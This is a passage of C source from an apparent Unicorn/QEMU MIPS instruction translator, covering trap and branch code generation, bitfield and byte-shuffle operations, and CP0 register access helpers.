t0, t0, t1); break; case OPC_SEQU_CP2: case OPC_SEQ_CP2: cond = TCG_COND_EQ; goto do_cc_cond; break; case OPC_SLTU_CP2: cond = TCG_COND_LTU; goto do_cc_cond; break; case OPC_SLT_CP2: cond = TCG_COND_LT; goto do_cc_cond; break; case OPC_SLEU_CP2: cond = TCG_COND_LEU; goto do_cc_cond; break; case OPC_SLE_CP2: cond = TCG_COND_LE; do_cc_cond: { int cc = (ctx->opcode >> 8) & 0x7; TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); TCGv_i32 t32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_setcond_i64(tcg_ctx, cond, t64, t0, t1); tcg_gen_extrl_i64_i32(tcg_ctx, t32, t64); tcg_gen_deposit_i32(tcg_ctx, tcg_ctx->fpu_fcr31, tcg_ctx->fpu_fcr31, t32, get_fp_bit(cc), 1); tcg_temp_free_i32(tcg_ctx, t32); tcg_temp_free_i64(tcg_ctx, t64); } goto no_rd; break; default: MIPS_INVAL("loongson_cp2"); generate_exception_end(ctx, EXCP_RI); return; } gen_store_fpr64(ctx, t0, rd); no_rd: tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* Traps */ static void gen_trap(DisasContext *ctx, uint32_t opc, int rs, int rt, int16_t imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int cond; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); cond = 0; /* Load needed operands */ switch (opc) { case OPC_TEQ: case OPC_TGE: case OPC_TGEU: case OPC_TLT: case OPC_TLTU: case OPC_TNE: /* Compare two registers */ if (rs != rt) { gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, 
rt); cond = 1; } break; case OPC_TEQI: case OPC_TGEI: case OPC_TGEIU: case OPC_TLTI: case OPC_TLTIU: case OPC_TNEI: /* Compare register to immediate */ if (rs != 0 || imm != 0) { gen_load_gpr(tcg_ctx, t0, rs); tcg_gen_movi_tl(tcg_ctx, t1, (int32_t)imm); cond = 1; } break; } if (cond == 0) { switch (opc) { case OPC_TEQ: /* rs == rs */ case OPC_TEQI: /* r0 == 0 */ case OPC_TGE: /* rs >= rs */ case OPC_TGEI: /* r0 >= 0 */ case OPC_TGEU: /* rs >= rs unsigned */ case OPC_TGEIU: /* r0 >= 0 unsigned */ /* Always trap */ generate_exception_end(ctx, EXCP_TRAP); break; case OPC_TLT: /* rs < rs */ case OPC_TLTI: /* r0 < 0 */ case OPC_TLTU: /* rs < rs unsigned */ case OPC_TLTIU: /* r0 < 0 unsigned */ case OPC_TNE: /* rs != rs */ case OPC_TNEI: /* r0 != 0 */ /* Never trap: treat as NOP. */ break; } } else { TCGLabel *l1 = gen_new_label(tcg_ctx); switch (opc) { case OPC_TEQ: case OPC_TEQI: tcg_gen_brcond_tl(tcg_ctx, TCG_COND_NE, t0, t1, l1); break; case OPC_TGE: case OPC_TGEI: tcg_gen_brcond_tl(tcg_ctx, TCG_COND_LT, t0, t1, l1); break; case OPC_TGEU: case OPC_TGEIU: tcg_gen_brcond_tl(tcg_ctx, TCG_COND_LTU, t0, t1, l1); break; case OPC_TLT: case OPC_TLTI: tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GE, t0, t1, l1); break; case OPC_TLTU: case OPC_TLTIU: tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GEU, t0, t1, l1); break; case OPC_TNE: case OPC_TNEI: tcg_gen_brcond_tl(tcg_ctx, TCG_COND_EQ, t0, t1, l1); break; } generate_exception(ctx, EXCP_TRAP); gen_set_label(tcg_ctx, l1); } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static inline bool use_goto_tb(DisasContext *ctx, target_ulong dest) { if (unlikely(ctx->base.singlestep_enabled)) { return false; } return (ctx->base.tb->pc & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK); } static inline void gen_goto_tb(DisasContext *ctx, int n, target_ulong dest) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (use_goto_tb(ctx, dest)) { tcg_gen_goto_tb(tcg_ctx, n); gen_save_pc(tcg_ctx, dest); tcg_gen_exit_tb(tcg_ctx, ctx->base.tb, n); } else { gen_save_pc(tcg_ctx, dest); if (ctx->base.singlestep_enabled) { save_cpu_state(ctx, 0); gen_helper_raise_exception_debug(tcg_ctx, tcg_ctx->cpu_env); } tcg_gen_lookup_and_goto_ptr(tcg_ctx); } } /* Branches (before delay slot) */ static void gen_compute_branch(DisasContext *ctx, uint32_t opc, int insn_bytes, int rs, int rt, int32_t offset, int delayslot_size) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong btgt = -1; int blink = 0; int bcond_compute = 0; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); if (ctx->hflags & MIPS_HFLAG_BMASK) { #ifdef MIPS_DEBUG_DISAS LOG_DISAS("Branch in delay / forbidden slot at PC 0x" TARGET_FMT_lx "\n", ctx->base.pc_next); #endif generate_exception_end(ctx, EXCP_RI); goto out; } /* Load needed operands */ switch (opc) { case OPC_BEQ: case OPC_BEQL: case OPC_BNE: case OPC_BNEL: /* Compare two registers */ if (rs != rt) { gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); bcond_compute = 1; } btgt = ctx->base.pc_next + insn_bytes + offset; break; case OPC_BGEZ: case OPC_BGEZAL: case OPC_BGEZALL: case OPC_BGEZL: case OPC_BGTZ: case OPC_BGTZL: case OPC_BLEZ: case OPC_BLEZL: case OPC_BLTZ: case OPC_BLTZAL: case OPC_BLTZALL: case OPC_BLTZL: /* Compare to zero */ if (rs != 0) { gen_load_gpr(tcg_ctx, t0, rs); bcond_compute = 1; } btgt = ctx->base.pc_next + insn_bytes + offset; break; case OPC_BPOSGE32: #if defined(TARGET_MIPS64) case OPC_BPOSGE64: tcg_gen_andi_tl(tcg_ctx, t0, tcg_ctx->cpu_dspctrl, 0x7F); #else tcg_gen_andi_tl(tcg_ctx, t0, tcg_ctx->cpu_dspctrl, 0x3F); #endif 
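/*
 * BPOSGE32/64 test the DSPControl pos field masked above; the
 * >= 32 (or >= 64) comparison itself is emitted with the other
 * conditions further down.
 */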
bcond_compute = 1; btgt = ctx->base.pc_next + insn_bytes + offset; break; case OPC_J: case OPC_JAL: case OPC_JALX: /* Jump to immediate */ btgt = ((ctx->base.pc_next + insn_bytes) & (int32_t)0xF0000000) | (uint32_t)offset; break; case OPC_JR: case OPC_JALR: /* Jump to register */ if (offset != 0 && offset != 16) { /* * Hint = 0 is JR/JALR, hint 16 is JR.HB/JALR.HB, the * others are reserved. */ MIPS_INVAL("jump hint"); generate_exception_end(ctx, EXCP_RI); goto out; } gen_load_gpr(tcg_ctx, tcg_ctx->btarget, rs); break; default: MIPS_INVAL("branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } if (bcond_compute == 0) { /* No condition to be computed */ switch (opc) { case OPC_BEQ: /* rx == rx */ case OPC_BEQL: /* rx == rx likely */ case OPC_BGEZ: /* 0 >= 0 */ case OPC_BGEZL: /* 0 >= 0 likely */ case OPC_BLEZ: /* 0 <= 0 */ case OPC_BLEZL: /* 0 <= 0 likely */ /* Always take */ ctx->hflags |= MIPS_HFLAG_B; break; case OPC_BGEZAL: /* 0 >= 0 */ case OPC_BGEZALL: /* 0 >= 0 likely */ /* Always take and link */ blink = 31; ctx->hflags |= MIPS_HFLAG_B; break; case OPC_BNE: /* rx != rx */ case OPC_BGTZ: /* 0 > 0 */ case OPC_BLTZ: /* 0 < 0 */ /* Treat as NOP. */ goto out; case OPC_BLTZAL: /* 0 < 0 */ /* * Handle as an unconditional branch to get correct delay * slot checking. */ blink = 31; btgt = ctx->base.pc_next + insn_bytes + delayslot_size; ctx->hflags |= MIPS_HFLAG_B; break; case OPC_BLTZALL: /* 0 < 0 likely */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[31], ctx->base.pc_next + 8); /* Skip the instruction in the delay slot */ ctx->base.pc_next += 4; goto out; case OPC_BNEL: /* rx != rx likely */ case OPC_BGTZL: /* 0 > 0 likely */ case OPC_BLTZL: /* 0 < 0 likely */ /* Skip the instruction in the delay slot */ ctx->base.pc_next += 4; goto out; case OPC_J: ctx->hflags |= MIPS_HFLAG_B; break; case OPC_JALX: ctx->hflags |= MIPS_HFLAG_BX; /* Fallthrough */ case OPC_JAL: blink = 31; ctx->hflags |= MIPS_HFLAG_B; break; case OPC_JR: ctx->hflags |= MIPS_HFLAG_BR; break; case OPC_JALR: blink = rt; ctx->hflags |= MIPS_HFLAG_BR; break; default: MIPS_INVAL("branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } } else { switch (opc) { case OPC_BEQ: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->bcond, t0, t1); goto not_likely; case OPC_BEQL: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->bcond, t0, t1); goto likely; case OPC_BNE: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->bcond, t0, t1); goto not_likely; case OPC_BNEL: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->bcond, t0, t1); goto likely; case OPC_BGEZ: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->bcond, t0, 0); goto not_likely; case OPC_BGEZL: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->bcond, t0, 0); goto likely; case OPC_BGEZAL: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->bcond, t0, 0); blink = 31; goto not_likely; case OPC_BGEZALL: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->bcond, t0, 0); blink = 31; goto likely; case OPC_BGTZ: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GT, tcg_ctx->bcond, t0, 0); goto not_likely; case OPC_BGTZL: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GT, tcg_ctx->bcond, t0, 0); goto likely; case OPC_BLEZ: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LE, tcg_ctx->bcond, t0, 0); goto not_likely; case OPC_BLEZL: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LE, tcg_ctx->bcond, t0, 0); goto likely; case OPC_BLTZ: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->bcond, t0, 0); goto not_likely; case OPC_BLTZL: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->bcond, t0, 0); goto likely; case 
OPC_BPOSGE32: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->bcond, t0, 32); goto not_likely; #if defined(TARGET_MIPS64) case OPC_BPOSGE64: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->bcond, t0, 64); goto not_likely; #endif case OPC_BLTZAL: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->bcond, t0, 0); blink = 31; not_likely: ctx->hflags |= MIPS_HFLAG_BC; break; case OPC_BLTZALL: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->bcond, t0, 0); blink = 31; likely: ctx->hflags |= MIPS_HFLAG_BL; break; default: MIPS_INVAL("conditional branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } } ctx->btarget = btgt; switch (delayslot_size) { case 2: ctx->hflags |= MIPS_HFLAG_BDS16; break; case 4: ctx->hflags |= MIPS_HFLAG_BDS32; break; } if (blink > 0) { int post_delay = insn_bytes + delayslot_size; int lowbit = !!(ctx->hflags & MIPS_HFLAG_M16); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[blink], ctx->base.pc_next + post_delay + lowbit); } out: if (insn_bytes == 2) { ctx->hflags |= MIPS_HFLAG_B16; } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* nanoMIPS Branches */ static void gen_compute_branch_nm(DisasContext *ctx, uint32_t opc, int insn_bytes, int rs, int rt, int32_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong btgt = -1; int bcond_compute = 0; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); /* Load needed operands */ switch (opc) { case OPC_BEQ: case OPC_BNE: /* Compare two registers */ if (rs != rt) { gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); bcond_compute = 1; } btgt = ctx->base.pc_next + insn_bytes + offset; break; case OPC_BGEZAL: /* Compare to zero */ if (rs != 0) { gen_load_gpr(tcg_ctx, t0, rs); bcond_compute = 1; } btgt = ctx->base.pc_next + insn_bytes + offset; break; case OPC_BPOSGE32: tcg_gen_andi_tl(tcg_ctx, t0, tcg_ctx->cpu_dspctrl, 0x3F); bcond_compute = 1; btgt = ctx->base.pc_next + insn_bytes + offset; break; case OPC_JR: case OPC_JALR: /* Jump to register */ if (offset != 0 && offset != 16) { /* * Hint = 0 is JR/JALR, hint 16 is JR.HB/JALR.HB, the * others are reserved. 
*/ MIPS_INVAL("jump hint"); generate_exception_end(ctx, EXCP_RI); goto out; } gen_load_gpr(tcg_ctx, tcg_ctx->btarget, rs); break; default: MIPS_INVAL("branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } if (bcond_compute == 0) { /* No condition to be computed */ switch (opc) { case OPC_BEQ: /* rx == rx */ /* Always take */ ctx->hflags |= MIPS_HFLAG_B; break; case OPC_BGEZAL: /* 0 >= 0 */ /* Always take and link */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[31], ctx->base.pc_next + insn_bytes); ctx->hflags |= MIPS_HFLAG_B; break; case OPC_BNE: /* rx != rx */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[31], ctx->base.pc_next + 8); /* Skip the instruction in the delay slot */ ctx->base.pc_next += 4; goto out; case OPC_JR: ctx->hflags |= MIPS_HFLAG_BR; break; case OPC_JALR: if (rt > 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], ctx->base.pc_next + insn_bytes); } ctx->hflags |= MIPS_HFLAG_BR; break; default: MIPS_INVAL("branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } } else { switch (opc) { case OPC_BEQ: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->bcond, t0, t1); goto not_likely; case OPC_BNE: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->bcond, t0, t1); goto not_likely; case OPC_BGEZAL: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->bcond, t0, 0); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[31], ctx->base.pc_next + insn_bytes); goto not_likely; case OPC_BPOSGE32: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->bcond, t0, 32); not_likely: ctx->hflags |= MIPS_HFLAG_BC; break; default: MIPS_INVAL("conditional branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } } ctx->btarget = btgt; out: if (insn_bytes == 2) { ctx->hflags |= MIPS_HFLAG_B16; } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* special3 bitfield operations */ static void gen_bitops(DisasContext *ctx, uint32_t opc, int rt, int rs, int lsb, int msb) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t1, rs); switch (opc) { case OPC_EXT: if (lsb + msb > 31) { goto fail; } if (msb != 31) { tcg_gen_extract_tl(tcg_ctx, t0, t1, lsb, msb + 1); } else { /* * The two checks together imply that lsb == 0, * so this is a simple sign-extension. */ tcg_gen_ext32s_tl(tcg_ctx, t0, t1); } break; #if defined(TARGET_MIPS64) case OPC_DEXTU: lsb += 32; goto do_dext; case OPC_DEXTM: msb += 32; goto do_dext; case OPC_DEXT: do_dext: if (lsb + msb > 63) { goto fail; } tcg_gen_extract_tl(tcg_ctx, t0, t1, lsb, msb + 1); break; #endif case OPC_INS: if (lsb > msb) { goto fail; } gen_load_gpr(tcg_ctx, t0, rt); tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, lsb, msb - lsb + 1); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); break; #if defined(TARGET_MIPS64) case OPC_DINSU: lsb += 32; /* FALLTHRU */ case OPC_DINSM: msb += 32; /* FALLTHRU */ case OPC_DINS: if (lsb > msb) { goto fail; } gen_load_gpr(tcg_ctx, t0, rt); tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, lsb, msb - lsb + 1); break; #endif default: fail: MIPS_INVAL("bitops"); generate_exception_end(ctx, EXCP_RI); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); return; } gen_store_gpr(tcg_ctx, t0, rt); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void gen_bshfl(DisasContext *ctx, uint32_t op2, int rt, int rd) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; if (rd == 0) { /* If no destination, treat it as a NOP. 
*/ return; } t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); switch (op2) { case OPC_WSBH: { TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_const_tl(tcg_ctx, 0x00FF00FF); tcg_gen_shri_tl(tcg_ctx, t1, t0, 8); tcg_gen_and_tl(tcg_ctx, t1, t1, t2); tcg_gen_and_tl(tcg_ctx, t0, t0, t2); tcg_gen_shli_tl(tcg_ctx, t0, t0, 8); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); } break; case OPC_SEB: tcg_gen_ext8s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); break; case OPC_SEH: tcg_gen_ext16s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); break; #if defined(TARGET_MIPS64) case OPC_DSBH: { TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_const_tl(tcg_ctx, 0x00FF00FF00FF00FFULL); tcg_gen_shri_tl(tcg_ctx, t1, t0, 8); tcg_gen_and_tl(tcg_ctx, t1, t1, t2); tcg_gen_and_tl(tcg_ctx, t0, t0, t2); tcg_gen_shli_tl(tcg_ctx, t0, t0, 8); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t1); } break; case OPC_DSHD: { TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_const_tl(tcg_ctx, 0x0000FFFF0000FFFFULL); tcg_gen_shri_tl(tcg_ctx, t1, t0, 16); tcg_gen_and_tl(tcg_ctx, t1, t1, t2); tcg_gen_and_tl(tcg_ctx, t0, t0, t2); tcg_gen_shli_tl(tcg_ctx, t0, t0, 16); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_gen_shri_tl(tcg_ctx, t1, t0, 32); tcg_gen_shli_tl(tcg_ctx, t0, t0, 32); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t1); } break; #endif default: MIPS_INVAL("bshfl"); generate_exception_end(ctx, EXCP_RI); tcg_temp_free(tcg_ctx, t0); return; } tcg_temp_free(tcg_ctx, t0); } static void gen_lsa(DisasContext *ctx, int opc, int rd, int rs, int rt, int imm2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; TCGv t1; if (rd == 0) { /* Treat as NOP. */ return; } t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_shli_tl(tcg_ctx, t0, t0, imm2 + 1); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); if (opc == OPC_LSA) { tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); } tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); return; } static void gen_align_bits(DisasContext *ctx, int wordsz, int rd, int rs, int rt, int bits) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; if (rd == 0) { /* Treat as NOP. 
*/ return; } t0 = tcg_temp_new(tcg_ctx); if (bits == 0 || bits == wordsz) { if (bits == 0) { gen_load_gpr(tcg_ctx, t0, rt); } else { gen_load_gpr(tcg_ctx, t0, rs); } switch (wordsz) { case 32: tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); break; #if defined(TARGET_MIPS64) case 64: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); break; #endif } } else { TCGv t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_load_gpr(tcg_ctx, t1, rs); switch (wordsz) { case 32: { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_tl_i64(tcg_ctx, t2, t1, t0); tcg_gen_shri_i64(tcg_ctx, t2, t2, 32 - bits); gen_move_low32(tcg_ctx, tcg_ctx->cpu_gpr[rd], t2); tcg_temp_free_i64(tcg_ctx, t2); } break; #if defined(TARGET_MIPS64) case 64: tcg_gen_shli_tl(tcg_ctx, t0, t0, bits); tcg_gen_shri_tl(tcg_ctx, t1, t1, 64 - bits); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t1, t0); break; #endif } tcg_temp_free(tcg_ctx, t1); } tcg_temp_free(tcg_ctx, t0); } static void gen_align(DisasContext *ctx, int wordsz, int rd, int rs, int rt, int bp) { gen_align_bits(ctx, wordsz, rd, rs, rt, bp * 8); } static void gen_ext(DisasContext *ctx, int wordsz, int rd, int rs, int rt, int shift) { gen_align_bits(ctx, wordsz, rd, rs, rt, wordsz - shift); } static void gen_bitswap(DisasContext *ctx, int opc, int rd, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; if (rd == 0) { /* Treat as NOP. */ return; } t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); switch (opc) { case OPC_BITSWAP: gen_helper_bitswap(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); break; #if defined(TARGET_MIPS64) case OPC_DBITSWAP: gen_helper_dbitswap(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); break; #endif } tcg_temp_free(tcg_ctx, t0); } /* CP0 (MMU and control) */ static inline void gen_mthc0_entrylo(TCGContext *tcg_ctx, TCGv arg, target_ulong off) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_tl_i64(tcg_ctx, t0, arg); tcg_gen_ld_i64(tcg_ctx, t1, tcg_ctx->cpu_env, off); #if defined(TARGET_MIPS64) tcg_gen_deposit_i64(tcg_ctx, t1, t1, t0, 30, 32); #else tcg_gen_concat32_i64(tcg_ctx, t1, t1, t0); #endif tcg_gen_st_i64(tcg_ctx, t1, tcg_ctx->cpu_env, off); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t0); } static inline void gen_mthc0_store64(TCGContext *tcg_ctx, TCGv arg, target_ulong off) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_tl_i64(tcg_ctx, t0, arg); tcg_gen_ld_i64(tcg_ctx, t1, tcg_ctx->cpu_env, off); tcg_gen_concat32_i64(tcg_ctx, t1, t1, t0); tcg_gen_st_i64(tcg_ctx, t1, tcg_ctx->cpu_env, off); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t0); } static inline void gen_mfhc0_entrylo(TCGContext *tcg_ctx, TCGv arg, target_ulong off) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, off); #if defined(TARGET_MIPS64) tcg_gen_shri_i64(tcg_ctx, t0, t0, 30); #else tcg_gen_shri_i64(tcg_ctx, t0, t0, 32); #endif gen_move_low32(tcg_ctx, arg, t0); tcg_temp_free_i64(tcg_ctx, t0); } static inline void gen_mfhc0_load64(TCGContext *tcg_ctx, TCGv arg, target_ulong off, int shift) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, off); tcg_gen_shri_i64(tcg_ctx, t0, t0, 32 + shift); gen_move_low32(tcg_ctx, arg, t0); tcg_temp_free_i64(tcg_ctx, t0); } static inline void gen_mfc0_load32(TCGContext *tcg_ctx, TCGv arg, target_ulong off) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, t0, tcg_ctx->cpu_env, off); tcg_gen_ext_i32_tl(tcg_ctx, 
arg, t0); tcg_temp_free_i32(tcg_ctx, t0); } static inline void gen_mfc0_load64(TCGContext *tcg_ctx, TCGv arg, target_ulong off) { tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, off); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); } static inline void gen_mtc0_store32(TCGContext *tcg_ctx, TCGv arg, target_ulong off) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, arg); tcg_gen_st_i32(tcg_ctx, t0, tcg_ctx->cpu_env, off); tcg_temp_free_i32(tcg_ctx, t0); } #define CP0_CHECK(c) \ do { \ if (!(c)) { \ goto cp0_unimplemented; \ } \ } while (0) static void gen_mfhc0(DisasContext *ctx, TCGv arg, int reg, int sel) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; //const char *register_name = "invalid"; switch (reg) { case CP0_REGISTER_02: switch (sel) { case 0: CP0_CHECK(ctx->hflags & MIPS_HFLAG_ELPA); gen_mfhc0_entrylo(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_EntryLo0)); //register_name = "EntryLo0"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_03: switch (sel) { case CP0_REG03__ENTRYLO1: CP0_CHECK(ctx->hflags & MIPS_HFLAG_ELPA); gen_mfhc0_entrylo(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_EntryLo1)); //register_name = "EntryLo1"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_09: switch (sel) { case CP0_REG09__SAAR: CP0_CHECK(ctx->saar); gen_helper_mfhc0_saar(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "SAAR"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_17: switch (sel) { case CP0_REG17__LLADDR: gen_mfhc0_load64(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_LLAddr), ctx->CP0_LLAddr_shift); //register_name = "LLAddr"; break; case CP0_REG17__MAAR: CP0_CHECK(ctx->mrp); gen_helper_mfhc0_maar(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "MAAR"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_19: switch (sel) { case CP0_REG19__WATCHHI0: case CP0_REG19__WATCHHI1: case CP0_REG19__WATCHHI2: case CP0_REG19__WATCHHI3: case CP0_REG19__WATCHHI4: case CP0_REG19__WATCHHI5: case CP0_REG19__WATCHHI6: case CP0_REG19__WATCHHI7: /* upper 32 bits are only available when Config5MI != 0 */ CP0_CHECK(ctx->mi); gen_mfhc0_load64(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_WatchHi[sel]), 0); //register_name = "WatchHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_28: switch (sel) { case 0: case 2: case 4: case 6: gen_mfhc0_load64(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_TagLo), 0); //register_name = "TagLo"; break; default: goto cp0_unimplemented; } break; default: goto cp0_unimplemented; } return; cp0_unimplemented: // qemu_log_mask(LOG_UNIMP, "mfhc0 %s (reg %d sel %d)\n", // register_name, reg, sel); tcg_gen_movi_tl(tcg_ctx, arg, 0); } static void gen_mthc0(DisasContext *ctx, TCGv arg, int reg, int sel) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; //const char *register_name = "invalid"; uint64_t mask = ctx->PAMask >> 36; switch (reg) { case CP0_REGISTER_02: switch (sel) { case 0: CP0_CHECK(ctx->hflags & MIPS_HFLAG_ELPA); tcg_gen_andi_tl(tcg_ctx, arg, arg, mask); gen_mthc0_entrylo(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_EntryLo0)); //register_name = "EntryLo0"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_03: switch (sel) { case CP0_REG03__ENTRYLO1: CP0_CHECK(ctx->hflags & MIPS_HFLAG_ELPA); tcg_gen_andi_tl(tcg_ctx, arg, arg, mask); gen_mthc0_entrylo(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_EntryLo1)); //register_name = "EntryLo1"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_09: switch (sel) { case CP0_REG09__SAAR: CP0_CHECK(ctx->saar); 
